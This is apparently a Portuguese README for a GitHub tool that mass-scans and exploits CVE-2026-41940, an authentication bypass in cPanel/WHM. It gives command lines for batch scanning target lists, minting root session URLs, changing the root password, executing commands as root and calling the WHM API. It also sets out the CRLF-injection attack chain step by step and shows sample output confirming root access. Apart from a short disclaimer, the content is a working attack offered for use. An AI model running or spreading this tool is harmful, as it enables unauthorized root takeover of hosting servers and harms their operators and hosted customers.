
cPanel/WHM CVE-2026-41940 - Scanner em Massa e Explorador
Ferramenta de Scanner e Exploit de Bypass de Autenticação cPanel/WHM para CVE-2026-41940
Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados.
Ao usar esta ferramenta, você concorda que:
❗ O autor NÃO é responsável por qualquer uso indevido, atividades ilegais, danos ou consequências legais resultantes do uso desta ferramenta.
CVE-2026-41940 é uma vulnerabilidade crítica de bypass de autenticação no cPanel/WHM que pode permitir que atacantes obtenham acesso não autorizado de nível root sem credenciais válidas.
Esta ferramenta fornece uma implementação baseada em Python para:
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| Campo | Valor |
|---|---|
| CVE | CVE-2026-41940 |
| Severidade | Crítica (CVSS 9.8) |
| Vetor de Ataque | Rede |
| Privilégios Necessários |
-hostnamePara testes seguros e legais:
Se este projeto ajudou você, considere dar uma ⭐
| Estágio | Descrição |
|---|
| 1. Pré-autenticação | Enviar credenciais inválidas para /login/ para obter o cookie whostmgrsession |
| 2. Injeção CRLF | Injetar nova linha via cabeçalho Authorization: Basic para vazar o token cpsess |
| 3. Propagação de Token | Acionar do_token_denied para propagar o token no cache |
| 4. Verificação | Acessar /json-api/version para confirmar acesso root ao WHM |
| Recurso | Descrição |
|---|
| 🔄 Varredura em Lote | Escanear vários alvos simultaneamente |
| 🎯 Alvo Único | Escanear um alvo individual com saída detalhada |
| 🔌 Varredura de Portas | Escanear automaticamente portas do WHM (2082, 2083, 2086, 2087) |
| 🔓 URL de Sessão | Gerar URL de login do WHM com um clique |
| 💀 RCE | Executar comandos do sistema como root |
| 🔑 Alterar Senha | Modificar a senha root do WHM |
| 📡 Chamadas à API do WHM | Chamar funções da API do WHM |
| 🎨 Saída Colorida | Saída visual para os resultados |
| 💾 Exportar Resultados | Salvar alvos vulneráveis em arquivo |
| Parâmetro | Descrição | Exemplo |
|---|
| -u | URL de um único alvo | -u https://target.com:2087 |
| -f | Arquivo de lista de alvos | -f targets.txt |
| -c | Concorrência (threads) | -c 20 |
| -o | Arquivo de saída | -o results.txt |
| -hostname | Cabeçalho Host personalizado | -hostname cpanel.target.com |
| --scan-ports | Escanear todas as portas do WHM | --scan-ports |
| -session | Gerar URL de login | -session |
| -passwd | Alterar senha root | -passwd "NewPass123" |
| -cmd | Executar comando | -cmd "id" |
| -keep | Manter conta temporária | -keep |
| -api | Chamar API do WHM | -api listaccts |
| -api-params | Parâmetros da API | -api-params "user=root,password=123" |
| Nenhum |
| Interação do Usuário | Nenhuma |